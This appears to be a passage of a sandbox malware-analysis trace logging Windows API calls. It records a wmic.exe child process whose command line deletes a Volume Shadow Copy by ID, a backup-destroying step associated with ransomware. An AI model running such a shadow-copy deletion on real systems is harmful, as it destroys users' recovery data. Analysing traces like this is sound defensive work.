[0105.260] CloseHandle (hObject=0x50) returned 1 [0105.260] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0105.260] GetProcessHeap () returned 0x470000 [0105.260] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48c360 | out: hHeap=0x470000) returned 1 [0105.260] GetEnvironmentStringsW () returned 0x48ad60* [0105.260] GetProcessHeap () returned 0x470000 [0105.260] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xae8) returned 0x48b850 [0105.260] FreeEnvironmentStringsW (penv=0x48ad60) returned 1 [0105.260] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0106.656] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2aeea8 | out: lpExitCode=0x2aeea8*=0x0) returned 1 [0106.656] CloseHandle (hObject=0x54) returned 1 [0106.656] _vsnwprintf (in: _Buffer=0x2af118, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aeeb8 | out: _Buffer="00000000") returned 8 [0106.656] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0106.656] GetProcessHeap () returned 0x470000 [0106.656] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48b850 | out: hHeap=0x470000) returned 1 [0106.656] GetEnvironmentStringsW () returned 0x48ad60* [0106.656] GetProcessHeap () returned 0x470000 [0106.656] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0e) returned 0x48b880 [0106.657] FreeEnvironmentStringsW (penv=0x48ad60) returned 1 [0106.657] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0106.657] GetProcessHeap () returned 0x470000 [0106.657] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48b880 | out: hHeap=0x470000) returned 1 [0106.657] GetEnvironmentStringsW () returned 0x48ad60* [0106.657] GetProcessHeap () returned 0x470000 [0106.657] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0e) returned 0x48b880 [0106.657] FreeEnvironmentStringsW (penv=0x48ad60) returned 1 [0106.657] GetProcessHeap () returned 0x470000 [0106.657] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488a30 | out: hHeap=0x470000) returned 1 [0106.657] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aef78 | out: lpAttributeList=0x2aef78) [0106.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.657] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0106.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0106.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 1 [0106.658] _get_osfhandle (_FileHandle=0) returned 0x3 [0106.658] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 1 [0106.659] SetConsoleInputExeNameW () returned 0x1 [0106.659] GetConsoleOutputCP () returned 0x1b5 [0106.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0106.659] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0106.659] exit (_Code=0) Process: id = "31" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0xa61b000" os_pid = "0x5bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0xb0c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 187 os_tid = 0x83c [0105.297] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfb10 | out: lpSystemTimeAsFileTime=0x1cfb10*(dwLowDateTime=0x46546290, dwHighDateTime=0x1d68245)) [0105.297] GetCurrentProcessId () returned 0x5bc [0105.297] GetCurrentThreadId () returned 0x83c [0105.297] GetTickCount () returned 0x114ffe2 [0105.297] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfb18 | out: lpPerformanceCount=0x1cfb18*=22518990704) returned 1 [0105.299] GetModuleHandleW (lpModuleName=0x0) returned 0xff3f0000 [0105.299] __set_app_type (_Type=0x1) [0105.299] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff43ced0) returned 0x0 [0105.299] __wgetmainargs (in: _Argc=0xff462380, _Argv=0xff462390, _Env=0xff462388, _DoWildCard=0, _StartInfo=0xff46239c | out: _Argc=0xff462380, _Argv=0xff462390, _Env=0xff462388) returned 0 [0105.299] ??0CHString@@QEAA@XZ () returned 0xff462ab0 [0105.299] malloc (_Size=0x30) returned 0x605a50 [0105.299] malloc (_Size=0x70) returned 0x605a90 [0105.299] malloc (_Size=0x50) returned 0x607d30 [0105.299] malloc (_Size=0x30) returned 0x607d90 [0105.299] malloc (_Size=0x48) returned 0x607dd0 [0105.299] malloc (_Size=0x30) returned 0x607e20 [0105.300] malloc (_Size=0x30) returned 0x607e60 [0105.300] ??0CHString@@QEAA@XZ () returned 0xff462f58 [0105.300] malloc (_Size=0x30) returned 0x607ea0 [0105.300] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0105.300] SetConsoleCtrlHandler (HandlerRoutine=0xff435724, Add=1) returned 1 [0105.300] _onexit (_Func=0xff44f378) returned 0xff44f378 [0105.300] _onexit (_Func=0xff44f490) returned 0xff44f490 [0105.300] _onexit (_Func=0xff44f4d0) returned 0xff44f4d0 [0105.300] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.300] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0105.303] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0105.309] CoCreateInstance (in: rclsid=0xff3f73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3f7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff462940 | out: ppv=0xff462940*=0x1c71390) returned 0x0 [0105.315] GetCurrentProcess () returned 0xffffffffffffffff [0105.315] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf8e0 | out: TokenHandle=0x1cf8e0*=0xf4) returned 1 [0105.315] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf8d8 | out: TokenInformation=0x0, ReturnLength=0x1cf8d8) returned 0 [0105.315] malloc (_Size=0x118) returned 0x6069a0 [0105.315] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x6069a0, TokenInformationLength=0x118, ReturnLength=0x1cf8d8 | out: TokenInformation=0x6069a0, ReturnLength=0x1cf8d8) returned 1 [0105.315] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x6069a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1832428873, Attributes=0x780d), (Luid.LowPart=0x0, Luid.HighPart=6323936, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0105.315] free (_Block=0x6069a0) [0105.315] CloseHandle (hObject=0xf4) returned 1 [0105.315] malloc (_Size=0x40) returned 0x607ee0 [0105.315] malloc (_Size=0x40) returned 0x607f30 [0105.315] malloc (_Size=0x40) returned 0x607f80 [0105.315] malloc (_Size=0x20a) returned 0x6069a0 [0105.315] GetSystemDirectoryW (in: lpBuffer=0x6069a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.315] free (_Block=0x6069a0) [0105.315] malloc (_Size=0x18) returned 0x1ddfb0 [0105.315] malloc (_Size=0x18) returned 0x6069a0 [0105.316] malloc (_Size=0x18) returned 0x6069c0 [0105.316] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0105.316] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0105.316] free (_Block=0x1ddfb0) [0105.316] free (_Block=0x6069a0) [0105.316] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0105.316] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0105.316] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.316] FreeLibrary (hLibModule=0x77940000) returned 1 [0105.316] free (_Block=0x6069c0) [0105.316] _vsnwprintf (in: _Buffer=0x607f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cf508 | out: _Buffer="ms_409") returned 6 [0105.316] malloc (_Size=0x20) returned 0x6069a0 [0105.316] GetComputerNameW (in: lpBuffer=0x6069a0, nSize=0x1cf8e0 | out: lpBuffer="XDUWTFONO", nSize=0x1cf8e0) returned 1 [0105.317] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.317] malloc (_Size=0x14) returned 0x1ddfb0 [0105.317] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.317] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cf8d8 | out: lpNameBuffer=0x0, nSize=0x1cf8d8) returned 0x7fffffdd000 [0105.317] GetLastError () returned 0xea [0105.317] malloc (_Size=0x40) returned 0x6069d0 [0105.318] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x6069d0, nSize=0x1cf8d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cf8d8) returned 0x1 [0105.318] lstrlenW (lpString="") returned 0 [0105.318] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0105.319] lstrlenW (lpString=".") returned 1 [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0105.319] lstrlenW (lpString="LOCALHOST") returned 9 [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0105.319] free (_Block=0x1ddfb0) [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] malloc (_Size=0x14) returned 0x1ddfb0 [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] malloc (_Size=0x14) returned 0x606a20 [0105.319] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.319] malloc (_Size=0x8) returned 0x606a40 [0105.319] malloc (_Size=0x18) returned 0x606a60 [0105.319] malloc (_Size=0x30) returned 0x606a80 [0105.319] malloc (_Size=0x18) returned 0x606ac0 [0105.319] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.319] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.319] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.319] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.319] malloc (_Size=0x30) returned 0x606ae0 [0105.319] malloc (_Size=0x18) returned 0x606b20 [0105.320] SysStringLen (param_1="IMPERSONATE") returned 0xb [0105.320] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.320] SysStringLen (param_1="IMPERSONATE") returned 0xb [0105.320] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.320] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.320] SysStringLen (param_1="IMPERSONATE") returned 0xb [0105.320] malloc (_Size=0x30) returned 0x606b40 [0105.320] malloc (_Size=0x18) returned 0x606b80 [0105.320] SysStringLen (param_1="DELEGATE") returned 0x8 [0105.320] SysStringLen (param_1="IDENTIFY") returned 0x8 [0105.320] SysStringLen (param_1="DELEGATE") returned 0x8 [0105.320] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.320] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0105.320] SysStringLen (param_1="DELEGATE") returned 0x8 [0105.320] malloc (_Size=0x30) returned 0x606ba0 [0105.320] malloc (_Size=0x18) returned 0x606be0 [0105.320] malloc (_Size=0x30) returned 0x606c00 [0105.320] malloc (_Size=0x18) returned 0x606c40 [0105.320] SysStringLen (param_1="NONE") returned 0x4 [0105.320] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.320] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.320] SysStringLen (param_1="NONE") returned 0x4 [0105.320] malloc (_Size=0x30) returned 0x606c60 [0105.320] malloc (_Size=0x18) returned 0x606ca0 [0105.320] SysStringLen (param_1="CONNECT") returned 0x7 [0105.320] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.320] malloc (_Size=0x30) returned 0x606cc0 [0105.320] malloc (_Size=0x18) returned 0x606d00 [0105.320] SysStringLen (param_1="CALL") returned 0x4 [0105.320] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.320] SysStringLen (param_1="CALL") returned 0x4 [0105.320] SysStringLen (param_1="CONNECT") returned 0x7 [0105.320] malloc (_Size=0x30) returned 0x606d20 [0105.321] malloc (_Size=0x18) returned 0x606d60 [0105.321] SysStringLen (param_1="PKT") returned 0x3 [0105.321] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.321] SysStringLen (param_1="PKT") returned 0x3 [0105.321] SysStringLen (param_1="NONE") returned 0x4 [0105.321] SysStringLen (param_1="NONE") returned 0x4 [0105.321] SysStringLen (param_1="PKT") returned 0x3 [0105.321] malloc (_Size=0x30) returned 0x606d80 [0105.321] malloc (_Size=0x18) returned 0x606dc0 [0105.321] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.321] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.321] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.321] SysStringLen (param_1="NONE") returned 0x4 [0105.321] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.321] SysStringLen (param_1="PKT") returned 0x3 [0105.321] SysStringLen (param_1="PKT") returned 0x3 [0105.321] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.321] malloc (_Size=0x30) returned 0x608000 [0105.321] malloc (_Size=0x18) returned 0x606de0 [0105.322] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.322] SysStringLen (param_1="DEFAULT") returned 0x7 [0105.322] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.322] SysStringLen (param_1="PKT") returned 0x3 [0105.322] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.322] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.322] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0105.322] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0105.322] malloc (_Size=0x30) returned 0x608040 [0105.322] malloc (_Size=0x40) returned 0x606e00 [0105.322] malloc (_Size=0x20a) returned 0x606e50 [0105.322] GetSystemDirectoryW (in: lpBuffer=0x606e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.322] free (_Block=0x606e50) [0105.322] malloc (_Size=0x18) returned 0x606e50 [0105.322] malloc (_Size=0x18) returned 0x606e70 [0105.322] malloc (_Size=0x18) returned 0x606e90 [0105.322] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0105.322] SysStringLen (param_1="\\wbem\\") returned 0x6 [0105.322] free (_Block=0x606e50) [0105.322] free (_Block=0x606e70) [0105.322] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0105.322] free (_Block=0x606e90) [0105.322] malloc (_Size=0x18) returned 0x606e50 [0105.322] malloc (_Size=0x18) returned 0x606e70 [0105.322] malloc (_Size=0x18) returned 0x606e90 [0105.322] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0105.322] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0105.323] free (_Block=0x606e50) [0105.323] free (_Block=0x606e70) [0105.323] GetCurrentThreadId () returned 0x83c [0105.323] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf1e0 | out: phkResult=0x1cf1e0*=0xf8) returned 0x0 [0105.323] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf230, lpcbData=0x1cf1d0*=0x400 | out: lpType=0x0, lpData=0x1cf230*=0x30, lpcbData=0x1cf1d0*=0x4) returned 0x0 [0105.323] _wcsicmp (_String1="0", _String2="1") returned -1 [0105.323] _wcsicmp (_String1="0", _String2="2") returned -2 [0105.323] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf1d0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf1d0*=0x42) returned 0x0 [0105.323] malloc (_Size=0x86) returned 0x606eb0 [0105.323] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x606eb0, lpcbData=0x1cf1d0*=0x42 | out: lpType=0x0, lpData=0x606eb0*=0x25, lpcbData=0x1cf1d0*=0x42) returned 0x0 [0105.323] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0105.323] malloc (_Size=0x42) returned 0x606f40 [0105.323] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0105.323] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf230, lpcbData=0x1cf1d0*=0x400 | out: lpType=0x0, lpData=0x1cf230*=0x36, lpcbData=0x1cf1d0*=0xc) returned 0x0 [0105.323] _wtol (_String="65536") returned 65536 [0105.323] free (_Block=0x606eb0) [0105.323] RegCloseKey (hKey=0x0) returned 0x6 [0105.323] CoCreateInstance (in: rclsid=0xff3f7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3f73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cf6d8 | out: ppv=0x1cf6d8*=0x21b71d0) returned 0x0 [0105.338] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x21b71d0, xmlSource=0x1cf820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x606e50), isSuccessful=0x1cf890 | out: isSuccessful=0x1cf890*=0xffff) returned 0x0 [0105.462] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21b71d0, DOMElement=0x1cf6d0 | out: DOMElement=0x1cf6d0) returned 0x0 [0105.462] malloc (_Size=0x18) returned 0x606e50 [0105.462] free (_Block=0x606e50) [0105.462] malloc (_Size=0x18) returned 0x606e50 [0105.462] free (_Block=0x606e50) [0105.462] malloc (_Size=0x18) returned 0x606e50 [0105.462] malloc (_Size=0x18) returned 0x606e70 [0105.462] malloc (_Size=0x30) returned 0x608080 [0105.463] malloc (_Size=0x18) returned 0x606eb0 [0105.463] free (_Block=0x606eb0) [0105.463] malloc (_Size=0x18) returned 0x60c560 [0105.463] malloc (_Size=0x18) returned 0x60c580 [0105.463] SysStringLen (param_1="VALUE") returned 0x5 [0105.463] SysStringLen (param_1="TABLE") returned 0x5 [0105.463] SysStringLen (param_1="TABLE") returned 0x5 [0105.463] SysStringLen (param_1="VALUE") returned 0x5 [0105.463] malloc (_Size=0x30) returned 0x6080c0 [0105.463] malloc (_Size=0x18) returned 0x60c5a0 [0105.463] free (_Block=0x60c5a0) [0105.463] malloc (_Size=0x18) returned 0x60c5a0 [0105.463] malloc (_Size=0x18) returned 0x60c5c0 [0105.464] SysStringLen (param_1="LIST") returned 0x4 [0105.464] SysStringLen (param_1="TABLE") returned 0x5 [0105.464] malloc (_Size=0x30) returned 0x608100 [0105.464] malloc (_Size=0x18) returned 0x60c5e0 [0105.464] free (_Block=0x60c5e0) [0105.464] malloc (_Size=0x18) returned 0x60c5e0 [0105.464] malloc (_Size=0x18) returned 0x60c600 [0105.464] SysStringLen (param_1="RAWXML") returned 0x6 [0105.464] SysStringLen (param_1="TABLE") returned 0x5 [0105.464] SysStringLen (param_1="RAWXML") returned 0x6 [0105.464] SysStringLen (param_1="LIST") returned 0x4 [0105.464] SysStringLen (param_1="LIST") returned 0x4 [0105.464] SysStringLen (param_1="RAWXML") returned 0x6 [0105.464] malloc (_Size=0x30) returned 0x608140 [0105.464] malloc (_Size=0x18) returned 0x60c620 [0105.464] free (_Block=0x60c620) [0105.465] malloc (_Size=0x18) returned 0x60c620 [0105.465] malloc (_Size=0x18) returned 0x60c640 [0105.465] SysStringLen (param_1="HTABLE") returned 0x6 [0105.465] SysStringLen (param_1="TABLE") returned 0x5 [0105.465] SysStringLen (param_1="HTABLE") returned 0x6 [0105.465] SysStringLen (param_1="LIST") returned 0x4 [0105.465] malloc (_Size=0x30) returned 0x608180 [0105.465] malloc (_Size=0x18) returned 0x60c660 [0105.465] free (_Block=0x60c660) [0105.465] malloc (_Size=0x18) returned 0x60c660 [0105.465] malloc (_Size=0x18) returned 0x60c680 [0105.465] SysStringLen (param_1="HFORM") returned 0x5 [0105.465] SysStringLen (param_1="TABLE") returned 0x5 [0105.465] SysStringLen (param_1="HFORM") returned 0x5 [0105.465] SysStringLen (param_1="LIST") returned 0x4 [0105.465] SysStringLen (param_1="HFORM") returned 0x5 [0105.465] SysStringLen (param_1="HTABLE") returned 0x6 [0105.465] malloc (_Size=0x30) returned 0x6081c0 [0105.466] malloc (_Size=0x18) returned 0x60c6a0 [0105.466] free (_Block=0x60c6a0) [0105.466] malloc (_Size=0x18) returned 0x60c6a0 [0105.466] malloc (_Size=0x18) returned 0x60c6c0 [0105.466] SysStringLen (param_1="XML") returned 0x3 [0105.466] SysStringLen (param_1="TABLE") returned 0x5 [0105.466] SysStringLen (param_1="XML") returned 0x3 [0105.466] SysStringLen (param_1="VALUE") returned 0x5 [0105.466] SysStringLen (param_1="VALUE") returned 0x5 [0105.466] SysStringLen (param_1="XML") returned 0x3 [0105.466] malloc (_Size=0x30) returned 0x608200 [0105.466] malloc (_Size=0x18) returned 0x60c6e0 [0105.466] free (_Block=0x60c6e0) [0105.466] malloc (_Size=0x18) returned 0x60c6e0 [0105.466] malloc (_Size=0x18) returned 0x60c700 [0105.466] SysStringLen (param_1="MOF") returned 0x3 [0105.467] SysStringLen (param_1="TABLE") returned 0x5 [0105.467] SysStringLen (param_1="MOF") returned 0x3 [0105.467] SysStringLen (param_1="LIST") returned 0x4 [0105.467] SysStringLen (param_1="MOF") returned 0x3 [0105.467] SysStringLen (param_1="RAWXML") returned 0x6 [0105.467] SysStringLen (param_1="LIST") returned 0x4 [0105.467] SysStringLen (param_1="MOF") returned 0x3 [0105.467] malloc (_Size=0x30) returned 0x608240 [0105.467] malloc (_Size=0x18) returned 0x60c720 [0105.467] free (_Block=0x60c720) [0105.467] malloc (_Size=0x18) returned 0x60c720 [0105.467] malloc (_Size=0x18) returned 0x60c740 [0105.467] SysStringLen (param_1="CSV") returned 0x3 [0105.467] SysStringLen (param_1="TABLE") returned 0x5 [0105.467] SysStringLen (param_1="CSV") returned 0x3 [0105.467] SysStringLen (param_1="LIST") returned 0x4 [0105.467] SysStringLen (param_1="CSV") returned 0x3 [0105.467] SysStringLen (param_1="HTABLE") returned 0x6 [0105.467] SysStringLen (param_1="CSV") returned 0x3 [0105.467] SysStringLen (param_1="HFORM") returned 0x5 [0105.467] malloc (_Size=0x30) returned 0x608280 [0105.468] malloc (_Size=0x18) returned 0x60c760 [0105.468] free (_Block=0x60c760) [0105.468] malloc (_Size=0x18) returned 0x60c760 [0105.468] malloc (_Size=0x18) returned 0x60c780 [0105.468] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.468] SysStringLen (param_1="TABLE") returned 0x5 [0105.468] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.468] SysStringLen (param_1="VALUE") returned 0x5 [0105.468] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.468] SysStringLen (param_1="XML") returned 0x3 [0105.468] SysStringLen (param_1="XML") returned 0x3 [0105.468] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.468] malloc (_Size=0x30) returned 0x6082c0 [0105.468] malloc (_Size=0x18) returned 0x60c7a0 [0105.468] free (_Block=0x60c7a0) [0105.468] malloc (_Size=0x18) returned 0x60c7a0 [0105.468] malloc (_Size=0x18) returned 0x60c7c0 [0105.468] SysStringLen (param_1="texttablewsys") returned 0xd [0105.468] SysStringLen (param_1="TABLE") returned 0x5 [0105.468] SysStringLen (param_1="texttablewsys") returned 0xd [0105.469] SysStringLen (param_1="XML") returned 0x3 [0105.469] SysStringLen (param_1="texttablewsys") returned 0xd [0105.469] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.469] SysStringLen (param_1="XML") returned 0x3 [0105.469] SysStringLen (param_1="texttablewsys") returned 0xd [0105.469] malloc (_Size=0x30) returned 0x608300 [0105.469] malloc (_Size=0x18) returned 0x60c7e0 [0105.469] free (_Block=0x60c7e0) [0105.469] malloc (_Size=0x18) returned 0x60c7e0 [0105.469] malloc (_Size=0x18) returned 0x60c800 [0105.469] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.469] SysStringLen (param_1="TABLE") returned 0x5 [0105.469] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.469] SysStringLen (param_1="XML") returned 0x3 [0105.469] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.469] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.469] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0105.469] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0105.469] malloc (_Size=0x30) returned 0x608340 [0105.470] malloc (_Size=0x18) returned 0x60c820 [0105.470] free (_Block=0x60c820) [0105.470] malloc (_Size=0x18) returned 0x60c820 [0105.470] malloc (_Size=0x18) returned 0x60c840 